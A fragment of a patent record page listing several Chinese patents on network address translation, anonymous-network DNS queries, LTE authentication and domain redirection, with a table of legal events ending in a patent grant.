CN103152444B (en) * | 2013-03-25 | 2016-08-03 | 华为技术有限公司 | The network address translation of trunking scheme and message transmitting method and device, system |
CN103825969A (en) * | 2013-10-29 | 2014-05-28 | 电子科技大学 | DNS query method based on anonymous network |
CN105376851B (en) * | 2014-08-29 | 2019-06-11 | 中国电信股份有限公司 | A kind of network attached method and system |
CN106034300A (en) * | 2015-03-11 | 2016-10-19 | 普天信息技术有限公司 | Authentication connection method based on TD-LTE wireless communication network and base station |
CN107613037B (en) * | 2017-09-14 | 2021-11-12 | 山东中网云安智能科技有限公司 | Domain name redirection method and system |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||